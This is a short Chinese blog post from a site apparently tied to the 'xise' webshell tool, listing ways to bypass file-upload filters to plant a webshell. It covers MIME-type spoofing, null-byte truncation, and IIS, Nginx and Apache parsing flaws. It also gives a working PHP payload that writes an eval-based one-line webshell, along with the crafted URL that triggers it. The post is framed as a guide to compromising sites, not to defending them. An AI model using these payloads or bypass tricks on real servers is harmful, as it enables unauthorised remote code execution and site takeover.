您所在的位置:首页 > web漏洞 >绕过上传木马骚姿势

绕过上传木马骚姿势

xise官网
xise xise
2019-02-03 18:46:44 阅读 649

漏洞的几种情况:


B7`I_3L8SUQV21YL)G9Q{LU.png

MIME类型绕过漏洞(content-type:)

文件内容检测绕过

空字节截断(%00,0x00)

解析导致的文件上传漏洞:

IIS6.0/IIS7.0/IIS7.5

Apache站上的解析缺陷绕过上传

htaccess文件上传解析漏洞

还有就是各种cms漏洞以及编辑器漏洞获取webshell。

 

先从IIS服务器开始吧(不对的地方欢迎给位大大指出):

IIS6.0 :

1.如果存在 a.asp目录,那么我们在该目录下上传的文件都会以asp解析 比如/a.asp/a.jpg

2.上传a.asp;.xx.jpg类型的文件,web服务器查到“;”会内存截断,所以就变成了a.asp文件,据说是iis的特性。


IIS7.0/7.5+Nginx≤0.8.37:

IIS7.0/7.5  由于PHP配置文件中,默认开启了cgi.fix_pathinfo,若url中存在 .php则iis交给php解析(所以不要怪解析漏洞不管用,可能是cgi被关闭了)

nginx和iis7.5类似,1.默认Fast-CGI开启状况下,上传一个x.jpg文件,内容为:  <?php fputs(fopen(‘shell.php‘,‘w‘),‘<?php eval($_POST[cmd])?>‘);?>

访问../../../x.jpg/.php会在改目录下生成一个shell.php;

2.上传图片马 访问xxx.jpg%00.php执行代码----原理

 Apache解析漏洞:

apache从右向左解析 所以  x.php.jpg文件将以x.php执行

© 著作权归作者所有
xise简介
xise 创始人
7年计算机项目开发经验,拥有5年计算机教学经验,擅长大型软件项目系统架构与开发。
评论信息
我要评论
关注:6541+
2019-02-06
关注:54+
2019-02-03
关注:649+
2019-02-03
关注:5465+
2019-02-03
关注:646+
2019-02-03
关注:6541+
2019-02-06
关注:54+
2019-02-03
关注:649+
2019-02-03
关注:5465+
2019-02-03
关注:646+
2019-02-03
友情链接:
  • 没有资料
  • |